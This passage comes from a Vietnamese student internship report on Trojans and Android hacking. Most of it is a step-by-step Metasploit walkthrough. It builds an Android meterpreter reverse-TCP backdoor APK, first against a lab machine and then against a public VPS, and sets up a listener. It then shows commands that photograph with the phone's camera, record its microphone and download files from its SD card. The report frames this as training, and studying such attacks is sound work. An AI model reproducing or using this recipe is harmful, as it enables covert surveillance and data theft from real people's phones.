Explorer, để nhúng Trojan vào một trang web, khi người dùng xem trang này sẽ bị nhiễm. Người dùng nên cập nhật các bản vá lỗithường xuyên và dùng một trình duyệt web có độ bảo mật cao nhưFirefox và Google chrome
Cách phòng chống: cách hữu hiệu nhất là đừng bao giờ mở các đính kèm được gửi đến một cách bất ngờ. Khi các đính kèm không được mở ra thì Trojan horse cũng không thể hoạt động. Cẩn thận với ngay cả các thư điện tử gửi từ các địa chỉ quen biết. Trong trường hợp biết chắc là có đính kèm từ nơi gửi quen biết thì vẩn cần phải thử lại bằng các chương trình chống virus trước khi mở nó. Các tệp tải về từ các dịch vụ chia sẻ tệp như là Kazaa hay Gnutella rất đáng nghi ngờ, vì các dịch vụ này thường bị dùng như là chỗ để lan truyền Trojan horse.
Malware: là sự ghép của hai chữ malicious và software) là một loạiphần mềm hệ thống do các tay tin tặc hay các kẻ nghịch ngợm tạo ra nhằm gây hại cho các máy tính. Tùy theo cách thức mà tin tặc dùng, sự nguy hại của các loại phần mềm ác ý có khác nhau từ chỗ chỉ hiển thị các cửa sổ hù dọa cho đến việc tấn công chiếm máy và lây lan sang các máy khác như là virus trong cơ thể của các sinh vật.
SVTT LÝ KHÁNH TRUNG 30
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
2.1.5 Tạo mã độc trên Kali LinuxĐể thực hiện, ta sử dụng Metasploit framework trên Kali Linux vừa cài đặt ở
trên để tạo một payload, khi thiết bị android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng VMware, ta nên thiết lập phần Network như sau:
Bấm vào VM -> Settings... ở thanh lựa chọn của Vmware
SVTT LÝ KHÁNH TRUNG 31
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Bấm vào Network Adapter và chọn Bridged: connection directly to the physical network
Chọn Edit -> Virtual Network Editor...
SVTT LÝ KHÁNH TRUNG 32
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật
Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển thiết bị android:
Đầu tiên mở terminal và gõ dòng lệnh ifconfig để xem ip của máy tấn công Kali
SVTT LÝ KHÁNH TRUNG 33
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Nhập vào lệnh dưới đây:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.138.131 lport=8080 R > /root/Desktop/files.apk
SVTT LÝ KHÁNH TRUNG 34
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
192.168.168.131 là địa chỉ IP của máy Kali mà ta vừa tìm được bên trên
8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng (0-1023)
Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một Metasploit reverse tcp backdoor.
Tiếp theo, gõ lệnh msfconsole. Bước này có thể sẽ đợi một chút.
SVTT LÝ KHÁNH TRUNG 35
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.138.131 – [nhập địa chỉ IP giống với khi tạo payload ở trên].
set lport 8080 – [nhập port giống với port khi tạo payload ở trên].
Exploit
Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.
SVTT LÝ KHÁNH TRUNG 36
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Tới đây ta chỉ đợi cho thiết bị android đó bị nhiễm mã độc vừa tạo (tải files.apk, đưa vào thiết bị thông qua bluetooth…), ta tiến hành đánh cắp thông tin. Sau đây là một số cách điều khiển thiết bị từ máy tấn công Kali.
Sử dụng camera:Để xem danh sách camera, nhập webcam_list
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera ở phần trước. Ví dụ như sau:
SVTT LÝ KHÁNH TRUNG 37
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở /root của máy.
Ghi âm
Để thực hiện ghi âm, nhập lệnh record_mic và file ghi âm sẽ được lưu về máy
SVTT LÝ KHÁNH TRUNG 38
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
2.1.6 Xâm nhập SDcard của thiết bị Android bị nhiễmĐể vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư
mục
Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard
SVTT LÝ KHÁNH TRUNG 39
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Dùng lệnh cd /sdcard/Download để vào thư mục
Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh
Download App.apk
Và file này sẽ được tải về thư mục /root của máy Kali
SVTT LÝ KHÁNH TRUNG 40
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
2.2 Thực hiện trên Virtual Private Server – VPS
2.2.1 Giới thiệu về VPSVPS là gì?
Máy chủ ảo hay Máy chủ riêng ảo (Virtual Private Server - VPS) là phương pháp phân chia một máy chủ vật lý thành nhiều máy chủ ảo.
Lợi thế khi dùng VPS?
Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn quyền quản lý root và có thể khởi động lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn chế 100% khả năng bị tấn công hack local.
Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng đến các Website khác cùng server. Riêng server VPS, một tài khoản VPS bị tấn công thì mọi tài khoản VPS khác trên server đều không bị ảnh hưởng.
Hoạt động hoàn toàn như một server riêng nhưng tiết kiệm được rất nhiều chi phí nếu so sánh với việc thuê một Server riêng.
SVTT LÝ KHÁNH TRUNG 41
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Ngoài việc thiết lập Web Server, Mail Server cũng như các ứng dụng khác trên VPS thì người dùng còn có thể cài đặt để thực hiện những nhu cầu riêng như: truy cập Web bằng trình duyệt Web, download/upload bittorent với tốc độ cao...
Trong trường hợp VPS bị thiếu tài nguyên có thể dễ dàng nâng cấp thêm tài nguyên mà không phải khởi động lại hệ thống.
Có thể cài lại hệ điều hành với thời gian chỉ từ 5-10 phút.
2.2.2 Hướng dẫn cài đặt Metasploit để tạo mã độc trên VPSMetasploit Framework là một môi trường dùng để kiểm tra ,tấn công và
khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python.Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Bạn có thể download chương trình tại www.metasploit.com
Metasploit bao gồm 2 phiên bản dành cho người dùng là community và
pro. Ở đây ta chọn bản community vì nó miễn phí và thích hợp với việc nghiên
cứu.
SVTT LÝ KHÁNH TRUNG 42
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
SVTT LÝ KHÁNH TRUNG 43
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những phần mềm khác.
Chọn thư mục cài đặt và nhấn Next:
Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790 và nhấn Next:
SVTT LÝ KHÁNH TRUNG 44
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Để mặc định tên Server và số ngày sử dụng, tiếp tục nhấn Next để tiến hành cài đặt:
Đợi trong lúc Metasploit hoàn tất việc cài đặt
SVTT LÝ KHÁNH TRUNG 45
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Tiến trình hoàn tất, chọn Finish và chọn ô “Access Metasploit Web UI” để truy cập vào giao diện web của Metasploit:
Sau khi chọn Finish trình duyệt web sẽ mở lên và đi tới giao diện
SVTT LÝ KHÁNH TRUNG 46
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Nhấp vào liên kết: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để đăng kí Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi chọn Create Account:
Trình duyệt chuyển đến trang nhập khóa để kích hoạt chương trình, khóa này được gửi miễn phí đến mail khi tải phần mềm. Sau khi điền khóa nhấn “Activate License”:
SVTT LÝ KHÁNH TRUNG 47
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Giao diện chương trình Metasploit Console
2.2.3 Tiến hành xâm nhập thiết bị Android từ VPSVề cơ bản tạo mã độc trên VPS tương tự như trên khi làm Localhost, chỉ
thay ip của máy tấn công Kali bằng ip của VPS.
Sau khi đăng nhập vào VPS bằng Remote Desktop Connection trong Windows thì ta mở Metasploit lên như hình bên dưới:
SVTT LÝ KHÁNH TRUNG 48
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Chúng ta vẫn sử dụng câu lệnh sau:
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=5555
R > /root/Desktop/files.apk
Thay địa chỉ lhost bằng ip của VPS ta dùng để đăng nhập.
Các bước sau đó vẫn như bên phần Localhost đã hướng dẫn bên trên, tất
nhiên ip lhost sẽ là ip của VPS.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 14.0.21.58 (ip trùng với địa chỉ ip của VPS)
set lport 5555 (port trùng với port lúc tạo mã xâm nhập trên VPS)
SVTT LÝ KHÁNH TRUNG 49
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Tới đây ta đã tạo mã độc thành công và đợi cho thiết bị android nhiễm mã độc này, ta sẽ tiến hành đánh cắp thông tin hay điều khiển.
Sử dụng lệnh Help trong Metesploit để xem các chức năng hỗ trợ
SVTT LÝ KHÁNH TRUNG 50
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Lệnh sysinfo để xem thông tin cấu hình của thiết bị android. Lệnh ps để xem các tác vụ đang chạy Xem danh sách tập tin, thư mục sử dụng lệnh ls Thao tác camera của thiết bị sử dụng các lệnh sau:
o Webcam_list: danh sách các camera thiết bị sở hữuo Webcam_snap [id]: chụp hình với camera với id xem bằng
lệnh webcam_list. Để thực hiện ghi âm ta nhập lệnh record_mic và file ghi âm sẽ được
lưu về máy, ở đây file ghi âm được lưu tại C:/metasploit/uLiiZrZW.wav.
Để xem thông tin sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư mục
Để tải tập tin bất kì về máy sử dụng lệnh download [tên file]
SVTT LÝ KHÁNH TRUNG 51
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
CHƯƠNG 3: TỔNG KẾTCác kiến thức được bổ sung:
Hiểu thêm về các hệ điều hành (Android, Kali Linux, Backtrack) Biết thêm về cách sử dụng Metasploit để đánh cắp thông tin. Cách thức để tấn công một máy sử dụng hệ điều hành Windows thông
qua lớp System Hacking. Cách thức một malware thâm nhập và đánh cắp dữ liệu.
Các kĩ năng được rèn luyện:
Giải quyết công việc theo từng giai đoạn. Cố gắng hoàn thành công việc trong thời gian cho phép. Tập trung vào vấn đề quan trọng. Mạnh dạn trao đổi, chia sẻ kiến thức. Rèn luyện thêm kĩ năng thuyết trình.
Kết quả đạt được:
Thực hiện tấn công và đánh cắp dữ liệu từ một máy sử dụng hệ điều hành Windows
Tạo mã độc và tiêm nhiễm vào thiết bị android và tiến hành lấy thông tin cũng như điều khiển thiết bị này.
Tài liệu tham khảo
Bộ lab + CD hướng dẫn android của Athena Bộ lab + CD hướng dẫn System hacking của Athena
SVTT LÝ KHÁNH TRUNG 52
![[ATHENA] Bao cáo thực tập file word](https://img.dokumen.tips/doc/110x75/55c4a9d9bb61ebb2488b45a8/athena-bao-cao-thuc-tap-file-word.jpg)
![[ATHENA] Bao cáo thực tập file word powerpoint](https://img.dokumen.tips/doc/110x75/55ca3135bb61ebd9658b46af/athena-bao-cao-thuc-tap-file-word-powerpoint.jpg)
